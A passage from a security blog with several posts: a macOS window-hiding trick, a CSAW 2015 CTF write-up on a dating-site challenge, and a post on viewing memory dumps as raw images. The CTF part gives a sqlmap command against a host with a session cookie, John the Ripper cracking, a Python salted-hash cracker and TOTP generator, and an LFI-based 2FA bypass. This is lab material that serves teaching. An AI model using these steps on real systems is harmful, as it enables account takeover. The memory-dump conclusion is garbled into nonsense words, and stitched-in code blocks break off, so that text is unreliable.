reporting about this&nbsp;<strike>bug</strike>&nbsp;feature, don't forget to say that this is specially useful to play Youtube and Spotify playlists during parties at a friend's house. You don't want to leave your Mac logged in and unattended, so you simply preload the playlist and lock the screen using this cool technique.<br /><br /><br /><b>Bonus: Mac OS X 10.11 Hidden Window Bug</b><br /><br />This is yet another <strike>useless</strike>&nbsp;<a href="https://www.youtube.com/watch?v=nGf3PdZviXk">totally serious</a>&nbsp;bug affecting the new Mac OS X El Capitan. You can hide an application window from the user by moving it to another display and toggling the screen mirroring options. Here are the steps to reproduce this bug:<br /><br />1 - Connect your Mac to an external display ("Use As Separate Display")<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-5A5w8nW6EOo/VhSpbspgtdI/AAAAAAAABJw/ankGX_NvYPM/s1600/Screen%2BShot%2B2015-10-07%2Bat%2B2.10.37%2BAM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="189" src="http://1.bp.blogspot.com/-5A5w8nW6EOo/VhSpbspgtdI/AAAAAAAABJw/ankGX_NvYPM/s320/Screen%2BShot%2B2015-10-07%2Bat%2B2.10.37%2BAM.png" width="320" /></a></div><br />2 - Move the window you want to hide to the secondary display<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-GNKxBAqxIZM/VhStBTstZiI/AAAAAAAABKk/ALshRQhz1Eg/s1600/Screen%2BShot%2B2015-10-07%2Bat%2B2.25.33%2BAM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="261" src="http://4.bp.blogspot.com/-GNKxBAqxIZM/VhStBTstZiI/AAAAAAAABKk/ALshRQhz1Eg/s400/Screen%2BShot%2B2015-10-07%2Bat%2B2.25.33%2BAM.png" width="400" /></a></div>3 - Hit the&nbsp;<b>Exposé Key (F3)</b>, move the mouse cursor over the window you want to hide and hit the <b>Space Key</b>.<br /><br />4 - Toggle the screen mirroring options by pressing <b>Command + F1</b><br /><br />5 - The window is gone (OMGBBQ!!!)<br /><br />Proof-of-concept - Mac OS X 10.11:<br /><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/g5RmxeP_2dk/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/g5RmxeP_2dk?feature=player_embedded" width="320"></iframe></div><br /></div><div><br /></div><div>I personally use this to hide all the Mac applications from coworkers who leave their computers unlocked and unattended.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-40i0o23GCCA/VhSsCw72zdI/AAAAAAAABJ8/A786bJd4JGE/s1600/evilest.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="232" src="http://3.bp.blogspot.com/-40i0o23GCCA/VhSsCw72zdI/AAAAAAAABJ8/A786bJd4JGE/s320/evilest.gif" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com1tag:blogger.com,1999:blog-3296471108082693838.post-74438714465523387022015-09-20T19:30:00.001-03:002015-09-21T20:34:10.482-03:00CSAW CTF 2015 Write Up: Weebdate (web500)The annual CSAW CTF Qualification Round took place on September 18-20 and it was yet another really cool CTF. I played with my friends from TheGoonies and we ranked #128 overall (<a href="https://www.youtube.com/watch?v=hM5cj8OZZhk">The Goonies 'R' Good Enough</a>).<br /><br /><b>Task - Weebdate (web500)</b><br /><br /><div class="code">Since the Ashley Madison hack, a lot of high profile socialites have scrambled to find the hottest new dating sites. Unfortunately for us, that means they're taking more safety measures and only using secure websites. We have some suspicions that Donald Trump is using a new dating site called "weebdate" and also selling cocaine to fund his presidential campaign. 
We need you to get both his password and his 2 factor TOTP key so we can break into his profile and investigate.<br /><br />Flag is md5($totpkey.$password)<br /><br />http://54.210.118.179/</div><br />This is a basic Flask application running a dating site. The website has some features like most web applications we are used to: creating users, editing profiles, sending messages, searching users and <a href="https://en.wikipedia.org/wiki/Ashley_Madison_data_breach">exposing the whole customer data</a> through SQL Injection and LFI.<br /><br /><b>SQLi</b><br /><br />The CSP reporting URI was vulnerable to SQL injection. SQLmap had no problems finding and exploiting it.<br /><br /><div class="code">python sqlmap.py -u 'http://54.210.118.179:80/csp/view/1' --cookie='session=donaldtrump010_1442717300_f65cb746b519c2b49f8e938a896e08e96f5fc533' --dbms=mysql --batch </div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-n9__Gn783YI/Vf8oW0d4ieI/AAAAAAAABHw/xCeY0SGFvjM/s1600/sqli.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://4.bp.blogspot.com/-n9__Gn783YI/Vf8oW0d4ieI/AAAAAAAABHw/xCeY0SGFvjM/s640/sqli.png" width="532" /></a></div>The 'weeb' database had three tables: messages, reports and users. The 'users' table had eight columns:&nbsp;user_id, user_name,&nbsp;user_password,&nbsp;user_ip,&nbsp;user_image,&nbsp;user_credits, user_register_time and user_profile.<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-Cx6cZV0d6Zw/Vf8lD7Jw4xI/AAAAAAAABHo/5nwP345j4Po/s1600/Capturar.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="281" src="http://1.bp.blogspot.com/-Cx6cZV0d6Zw/Vf8lD7Jw4xI/AAAAAAAABHo/5nwP345j4Po/s640/Capturar.PNG" width="640" /></a></div><br /><br />Passwords had a SHA256 pattern so I quickly started cracking them using John The Ripper:<br /><br /><div class="code">john --format=raw-sha256 hash.txt --wordlist=rockyou.txt</div><br />Most cracked passwords had patterns like 'testtest', 'lablab' and 'guest1guest1'. After some time I realised that the username was used as a <a href="https://en.wikipedia.org/wiki/Salt_(cryptography)">salt</a>: a "cracked" 'testtest' is really the username and the password concatenated, which raw SHA-256 only matches when the two happen to be identical. I generated a small wordlist concatenating donaldtrump's user and password and I finally managed to crack it:<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-kHyegy2HaAE/Vf8lD3YA6II/AAAAAAAABHk/vnUTQIWU-Vg/s1600/crack.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="502" src="http://4.bp.blogspot.com/-kHyegy2HaAE/Vf8lD3YA6II/AAAAAAAABHk/vnUTQIWU-Vg/s640/crack.PNG" width="640" /></a></div><br /><br />The login form displays "Invalid verification code" when you type a wrong TOTP verification code and it returns "Invalid credentials" when you mistype the password, so the password can be confirmed on its own without a valid second factor.<br /><br />
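Two steps of the chain above, as an added Python example that is not part of the original write-up or the challenge: first the cracking step, trying each wordlist entry with the username as prefix, as suffix and unsalted against a SHA-256 hash (the salt placement is unknown from the outside, so all three are tried); then the second factor, which the write-up reaches after the LFI below, where the TOTP seed turns out to be derived from the username and the registration IP. The derive_seed() function here is a hypothetical stand-in for the challenge's generate_seed(), whose real formula is only visible in the screenshots; the HOTP/TOTP functions follow RFC 4226 / RFC 6238 and are checked against those RFCs' published vectors. The username, IP, hash and wordlist are constructed for the demo.

```python
"""Weebdate-style chain: crack a username-salted SHA-256, then regenerate the TOTP.

Added example. derive_seed() is HYPOTHETICAL (stands in for the challenge's
generate_seed()); hotp()/totp() are straight RFC 4226 / RFC 6238.
"""
import hashlib
import hmac
import struct
import time
from typing import Optional


def crack_salted_sha256(target_hex: str, username: str, wordlist):
    """Try each candidate as user+pass, pass+user and unsalted; return (password, layout)."""
    for pw in wordlist:
        for layout, data in (("user+pass", username + pw),
                             ("pass+user", pw + username),
                             ("unsalted", pw)):
            if hashlib.sha256(data.encode()).hexdigest() == target_hex:
                return pw, layout
    return None


def derive_seed(username: str, ip: str) -> bytes:
    """HYPOTHETICAL seed derivation: deterministic in attacker-known values,
    which is the whole weakness. The challenge's real formula is not reproduced here."""
    return hashlib.sha1(f"{username}:{ip}".encode()).digest()


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226: HMAC-SHA1 over the big-endian counter, dynamic truncation, decimal."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret: bytes, for_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238: HOTP with the counter = unix time / 30 s."""
    return hotp(secret, for_time // step, digits)


# Constructed sample: one record as the SQLi dump would yield it (user_name, user_ip,
# user_password). The stored hash here is sha256(username + password).
USERNAME = "donaldtrump"
REG_IP = "203.0.113.7"
TARGET_HASH = hashlib.sha256(b"donaldtrumpzebra").hexdigest()
WORDLIST = ["password", "trump2016", "zebra", "testtest"]


def attack(now: Optional[int] = None):
    """Recover the password, then a currently valid TOTP code from the derived seed."""
    cracked = crack_salted_sha256(TARGET_HASH, USERNAME, WORDLIST)
    if cracked is None:
        return None
    password, layout = cracked
    seed = derive_seed(USERNAME, REG_IP)
    code = totp(seed, int(time.time()) if now is None else now)
    return password, layout, code


if __name__ == "__main__":
    print(attack())
```

The fix on the server side is the obvious one: a per-user random TOTP secret generated at enrolment and stored (encrypted) with the account, never something recomputable from columns an SQL injection can read.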
I knew that his password was 'zebra' but I still needed to find out the TOTP algorithm in order to steal his seed.<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-JNjY4kVD6M4/Vf8qmEIYiwI/AAAAAAAABH8/DjSyk6doWJU/s1600/Screen%2BShot%2B2015-09-20%2Bat%2B6.55.41%2BPM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="515" src="http://3.bp.blogspot.com/-JNjY4kVD6M4/Vf8qmEIYiwI/AAAAAAAABH8/DjSyk6doWJU/s640/Screen%2BShot%2B2015-09-20%2Bat%2B6.55.41%2BPM.png" width="640" /></a></div><b>LFI</b><br /><br />The 'image_url' parameter from '/profile/edit' was vulnerable to LFI, displaying the full content of local files:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-_F10tup D13U/Vf8s3Cjd-iI/AAAAAAAABII/Wv5EibmGdqY/s1600/Screen%2BShot%2B2015-09-20%2Bat%2B7.01.16%2BPM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="280" src="http://4.bp.blogspot.com/-_F10tupD13U/Vf8s3Cjd-iI/AAAAAAAABII/Wv5EibmGdqY/s640/Screen%2BShot%2B2015-09-20%2Bat%2B7.01.16%2BPM.png" width="640" /></a></div><br /><br />A curious note here is that it was the first time I managed to find a bug using <a href="https://portswigger.net/burp/help/collaborator.html">Burp Collaborator</a>. The scanner identified the external HTTP/DNS interaction and after some digging I quickly found the LFI =)<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-Qefn9fh3TM8/Vf8zB4kXbEI/AAAAAAAABJQ/lWtpBiAMlOo/s1600/collab.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="468" src="http://1.bp.blogspot.com/-Qefn9fh3TM8/Vf8zB4kXbEI/AAAAAAAABJQ/lWtpBiAMlOo/s640/collab.png" width="640" /></a></div>After <strike>some</strike> a lot of time bruteforcing the dirs and files, we managed to find the server root:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-EGASeOZTSF8/Vf8tOfxQ8OI/AAAAAAAABIQ/1Bajj00Q5XY/s1600/brute.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="488" src="http://1.bp.blogspot.com/-EGASeOZTSF8/Vf8tOfxQ8OI/AAAAAAAABIQ/1Bajj00Q5XY/s640/brute.png" width="640" /></a></div>We are particularly interested in the&nbsp;generate_seed() function:<br /><br />- <u>server.py</u><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-gd63Mz5pZ-w/Vf8uANA-p2I/AAAAAAAABIc/PTUe7Nf00Bg/s1600/Screen%2BShot%2B2015-09-20%2Bat%2B7.10.00%2BPM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="496" src="http://4.bp.blogspot.com/-gd63Mz5pZ-w/Vf8uANA-p2I/AAAAAAAABIc/PTUe7Nf00Bg/s640/Screen%2BShot%2B2015-09-20%2Bat%2B7.10.00%2BPM.png" width="640" /></a></div><br />- <u>utils.py</u><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-G6cAaCSXJlk/Vf8uIeJd0JI/AAAAAAAABIs/u07y1OMAr0E/s1600/Screen%2BShot%2B2015-09-20%2Bat%2B7.09.16%2BPM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="http://3.bp.blogspot.com/-G6cAaCSXJlk/Vf8uIeJd0JI/AAAAAAAABIs/u07y1OMAr0E/s640/Screen%2BShot%2B2015-09-20%2Bat%2B7.09.16%2BPM.png" width="640" /></a></div><br />The TOTP seed is not stored server-side: it is derived at runtime from the username and the registration IP address. Both values were already in the SQLi dump of the users table, so we can call get_otp_key() ourselves to generate his TOTP key:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-sze_t8r0xQc/Vf8vgjL60RI/AAAAAAAABI4/UirAPhMHs_w/s1600/Screen%2BShot%2B2015-09-20%2Bat%2B7.17.49%2BPM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="528" src="http://4.bp.blogspot.com/-sze_t8r0xQc/Vf8vgjL60RI/AAAAAAAABI4/UirAPhMHs_w/s640/Screen%2BShot%2B2015-09-20%2Bat%2B7.17.49%2BPM.png" width="640" /></a></div>The flag is md5($totpkey.$password):&nbsp;<b style="text-align: center;">a8815ecd3c2b6d8e2e884e5eb6916900</b><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-mnBWI9GAYL8/Vf8w_cDQaSI/AAAAAAAABJE/x3vrq9B4f4A/s1600/Screen%2BShot%2B2015-09-20%2Bat%2B7.24.03%2BPM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="188" src="http://4.bp.blogspot.com/-mnBWI9GAYL8/Vf8w_cDQaSI/AAAAAAAABJE/x3vrq9B4f4A/s640/Screen%2BShot%2B2015-09-20%2Bat%2B7.24.03%2BPM.png" width="640" /></a></div>Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com1tag:blogger.com,1999:blog-3296471108082693838.post-5954158730381861442015-02-26T11:11:00.001-03:002015-02-27T00:56:54.499-03:00Extracting RAW pictures from memory dumps<b>Introduction</b><br /><br />Earlier today, while reading my Twitter timeline, I saw some Infosec folks discussing scripts/tools to identify RAW pictures in memory dumps. 
I decided, then, to write this blog post and share a small hack that I use to visualize data (including memory dumps).<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://twitter.com/angealbertini/status/570495262474416130"><img border="0" src="http://2.bp.blogspot.com/-GWwCuw__A6I/VO8l4Wj2kJI/AAAAAAAAA_U/lusMMXroRmc/s1600/ange.PNG" height="217" width="400" /></a></div><br /><br />A few months ago, I wrote a post detailing how to&nbsp;<a href="http://w00tsec.blogspot.com/2014/08/scan-internet-screenshot-all-things.html">Scan the Internet &amp; Screenshot All the Things</a>, now it's time to Dump the Memory &amp; Screenshot All the Things.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-6qB7pZYQm4c/VO7AgdTMMLI/AAAAAAAAA8c/LIeAiiNvtKQ/s1600/memfor.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-6qB7pZYQm4c/VO7AgdTMMLI/AAAAAAAAA8c/LIeAiiNvtKQ/s1600/memfor.jpg" height="239" width="320" /></a></div><br /><br /><b>Memory Dumps</b><br /><br />The first thing you will want to do is to narrow the analysis to the process containing interesting images/pictures. I'm going to use three different memory dumps here:<br /><br /><b>Remote Desktop Client - Windows 7 x64 (mstsc.exe)</b><br /><br />Let's use the Windows built-in RDP client to connect to an external server and dump the process memory using <a href="https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx">procdump</a>:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-JXAYtT2d_bk/VO7JPDqZaSI/AAAAAAAAA9A/JHAg-jy6h-4/s1600/rdp1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-JXAYtT2d_bk/VO7JPDqZaSI/AAAAAAAAA9A/JHAg-jy6h-4/s1600/rdp1.PNG" height="240" width="320" /></a></div><br /><div class="code">procdump.exe -ma mstsc.exe mstsc.dmp</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-kx_4kRmKA4o/VO7JTIGz-iI/AAAAAAAAA9I/6ZyUF55aS48/s1600/rdp2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-kx_4kRmKA4o/VO7JTIGz-iI/AAAAAAAAA9I/6ZyUF55aS48/s1600/rdp2.PNG" height="201" width="400" /></a></div><br /><br /><b>Microsoft Paint - Windows 7 x64 (mspaint.exe)</b><br /><br />Let's load/save a simple image file on Paint and run procdump again:<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-XXLe962Bpy4/VO7Jo25GYSI/AAAAAAAAA9Q/8eRzevEJnYk/s1600/paint1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-XXLe962Bpy4/VO7Jo25GYSI/AAAAAAAAA9Q/8eRzevEJnYk/s1600/paint1.PNG" height="280" width="320" /></a></div><br /><div class="code">procdump.exe -ma mspaint.exe mspaint.dmp</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-YskZ3ppgNrs/VO7JyfX8B3I/AAAAAAAAA9Y/Z00sGC0aMo8/s1600/mspaint2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-YskZ3ppgNrs/VO7JyfX8B3I/AAAAAAAAA9Y/Z00sGC0aMo8/s1600/mspaint2.PNG" height="201" width="400" /></a></div><br /><br /><b>9447 2014 CTF Challenge: coor coor - Windows XP (VirtualBox.exe)</b><br /><div>There's an <a href="https://twitter.com/jstnkndy/status/541104077086928898">awesome write-up</a> for this CTF challenge <a href="http://w00tsec.blogspot.com/2014/11/9447-2014-ctf-write-up-coor-coor.html">here</a>, go read it now if you haven't yet. We are going to use volatility to isolate the VirtualBox process memory from the full dump:</div><div><br /></div><div><div class="code">python vol.py -f challenge.vmem pslist</div></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-dn8guyuCORI/VO7EKuzeaZI/AAAAAAAAA8o/Rq9gXAcdBUM/s1600/001.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-dn8guyuCORI/VO7EKuzeaZI/AAAAAAAAA8o/Rq9gXAcdBUM/s1600/001.png" height="268" width="400" /></a></div><br /><div class="code">python vol.py -f challenge.vmem memdump -p 1568 --dump-dir=dump/</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-bqv6UPf1e_c/VO7ENjnC4cI/AAAAAAAAA8w/IFQsDegYTGc/s1600/002.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-bqv6UPf1e_c/VO7ENjnC4cI/AAAAAAAAA8w/IFQsDegYTGc/s1600/002.png" height="78" width="400" /></a></div><br /><br /><b>RAW Image Data</b><br /><br />Rename the file extensions from *.dmp to *.data, download/install&nbsp;<a href="http://www.gimp.org/">GIMP</a>&nbsp;and open them as "RAW Image Data":<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-vsOql0K-FGQ/VO7MG2EC5rI/AAAAAAAAA9k/DwMIcS5ZulQ/s1600/gimp1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-vsOql0K-FGQ/VO7MG2EC5rI/AAAAAAAAA9k/DwMIcS5ZulQ/s1600/gimp1.png" height="201" width="320" /></a></div><br />That's it, now you can use GIMP to navigate within the memory dump and analyse the rendered pixels/bitmaps at their respective offsets. It's worth mentioning that different images will be rendered using different image types (RGB, RGBA, BGR and so on) and variable widths: you may need to adjust these values until the rows line up.<br /><br />So what can we spot here?<br /><br /><ul><li>On the RDP memory dump, we can retrieve the tiles and windows displayed during the connection, including IP's, usernames and commands:</li></ul><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-GMXIXeu74wE/VO7OhJbOekI/AAAAAAAAA-A/Cw8TvH60rpI/s1600/Screenshot-Load%2BImage%2Bfrom%2BRaw%2BData-2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://3.bp.blogspot.com/-GMXIXeu74wE/VO7OhJbOekI/AAAAAAAAA-A/Cw8TvH60rpI/s1600/Screenshot-Load%2BImage%2Bfrom%2BRaw%2BData-2.png" height="320" width="306" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Windows commands</td></tr></tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://4.bp.blogspot.com/-NlypQNpsDPQ/VO7OaJhhF2I/AAAAAAAAA94/s7xotse3pXM/s1600/Screenshot-Load%2BImage%2Bfrom%2BRaw%2BData-1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://4.bp.blogspot.com/-NlypQNpsDPQ/VO7OaJhhF2I/AAAAAAAAA94/s7xotse3pXM/s1600/Screenshot-Load%2BImage%2Bfrom%2BRaw%2BData-1.png" height="320" width="306" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Remote Desktop Client Window</td></tr></tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-g80XGtUTVxo/VO7OUfM528I/AAAAAAAAA9w/9x4lrINv2kg/s1600/Screenshot-Load%2BImage%2Bfrom%2BRaw%2BData.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://3.bp.blogspot.com/-g80XGtUTVxo/VO7OUfM528I/AAAAAAAAA9w/9x4lrINv2kg/s1600/Screenshot-Load%2BImage%2Bfrom%2BRaw%2BData.png" height="320" width="306" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">RDP session</td></tr></tbody></table><div><ul><li>The Microsoft Paint picture can be easily spotted: it is upside down because that's the way BMP's are stored:</li></ul><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-0Cu1V3u-KdA/VO7PhZfWxJI/AAAAAAAAA-M/OHBDS9jAVPI/s1600/mspaint3.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://3.bp.blogspot.com/-0Cu1V3u-KdA/VO7PhZfWxJI/AAAAAAAAA-M/OHBDS9jAVPI/s1600/mspaint3.PNG" height="260" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">We need upside down backdoors "this big"<br /><br /></td></tr></tbody></table></div><ul><li>The most interesting artifacts were collected from the <a href="https://s3-us-west-2.amazonaws.com/elasticbeanstalk-us-west-2-467703568171/challenges/coorcoor.tar.bz2">Coor Coor dump</a>. 
The user was running a TrueCrypt container inside VirtualBox and without some offset welding we can see the Pidgin Window, the user worth (testicool69@yodawg.9447.plumbing) and a few OTR settings:</li></ul><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-Co9_LF3D41k/VO7RPpaKufI/AAAAAAAAA-Y/sMZ9nbSAMoE/s1600/Capturar.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://3.bp.blogspot.com/-Co9_LF3D41k/VO7RPpaKufI/AAAAAAAAA-Y/sMZ9nbSAMoE/s1600/Capturar.PNG" height="174" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">While True: width ++ || width--</td></tr></tbody></table><br />Notice that the Windows are not perfectly aligned here, but we can see the data by zooming in:<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-K8aXR1-YKHU/VO7RVCGTzQI/AAAAAAAAA-g/arzbR9kpgCg/s1600/2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://2.bp.blogspot.com/-K8aXR1-YKHU/VO7RVCGTzQI/AAAAAAAAA-g/arzbR9kpgCg/s1600/2.PNG" height="347" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Enhance pls</td></tr></tbody></table><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://4.bp.blogspot.com/-CO8pfXzdOTQ/VO8kNwTDi8I/AAAAAAAAA_I/urdpioJWy08/s1600/zoom.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" 
src="http://4.bp.blogspot.com/-CO8pfXzdOTQ/VO8kNwTDi8I/AAAAAAAAA_I/urdpioJWy08/s1600/zoom.PNG" height="266" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://hsto.org/storage2/b52/91b/ba7/b5291bba7250abd12010644ca848dd75.jpg">Looks like our killer is screwed. YEEAAAH.</a></td></tr></tbody></table><br />We can moreover spot the Window taskbar, just like the volatility <a href="https://github.com/volatilityfoundation/volatility/wiki/Command%20Reference%20Gui#screenshot">screenshot plugin</a>&nbsp;showed us on the <a href="http://w00tsec.blogspot.com/2014/11/9447-2014-ctf-write-up-coor-coor.html">previous write-up</a>:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-gVu9lB639W8/VO7St0SpR4I/AAAAAAAAA-s/Uckg7hiF9j8/s1600/window.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-gVu9lB639W8/VO7St0SpR4I/AAAAAAAAA-s/Uckg7hiF9j8/s1600/window.PNG" height="425" width="640" /></a></div><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-Kc3tz5eQYn8/VHuHZUt-GUI/AAAAAAAAAvU/EibDp3i3mYc/s1600/session_0.WinSta0.Default.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://2.bp.blogspot.com/-Kc3tz5eQYn8/VHuHZUt-GUI/AAAAAAAAAvU/EibDp3i3mYc/s1600/session_0.WinSta0.Default.png" height="227" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">python vol.py -f challenge.vmem screenshot -D screenshot/</td></tr></tbody></table><br />It's moreover possible to spot icons from the running programs, like this one from Virtualbox:<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; 
text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-pZTLt-oeXOI/VO8hLY6QIyI/AAAAAAAAA-8/0bjL9UY1OG8/s1600/vbox.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://1.bp.blogspot.com/-pZTLt-oeXOI/VO8hLY6QIyI/AAAAAAAAA-8/0bjL9UY1OG8/s1600/vbox.PNG" height="266" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">VirtualBox <a href="http://www.eightforums.com/attachments/virtualization/6578d1339062148t-vbox-ose-windows-xp-vista-7-8-64-bit-virtualbox.png">icon</a></td></tr></tbody></table><br /><br /><b>Conclusion</b><br /><br />This technique is very worldwide among ROM hackers as they try to find image patterns inside raw game dumps.Trammelsmy <a href="http://w00tsec.blogspot.com/2014/10/hacklu-2014-ctf-write-up-at-gunpoint.html">write-up from Hack.lu 2014 CTF</a> to find increasingly well-nigh it. By the way, you can moreover use <a href="http://www.romhacking.net/utilities/991/">Tile Molester</a>&nbsp;instead of GIMP to scan the RAW data.<br /><div><br /></div>You may be asking - why not whittle the dumps using binwalk and foremost or pericope them using the <a href="https://github.com/volatilityfoundation/volatility/wiki/Command%20Reference#dumpfiles">dumpfiles</a> volatility module? If you try it yourself you will notice that they won't find the magic bytes for all those images.<br /><br />As far as I know, there's no off-the-shelf tool to automagically pericope them, but it should't be that nonflexible to write a binwalk/volatility plugin for this based on some heuristics. 
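<br /><br />As an added example (this is not code from the original post, and not a binwalk or volatility plugin), here is the kind of heuristic such a plugin could start from: read the dump as rows of 32-bit BGRX pixels at a guessed width, look for runs of rows that are nearly identical to the row above them (that is what a window background or the taskbar looks like once the width is right), and carve the hit into a BMP. The pixel format, the thresholds, the list of common widths and the synthetic dump are all assumptions made for this example.<br /><br />

```python
"""Scan a raw memory dump for framebuffer-like regions and carve them to BMP.

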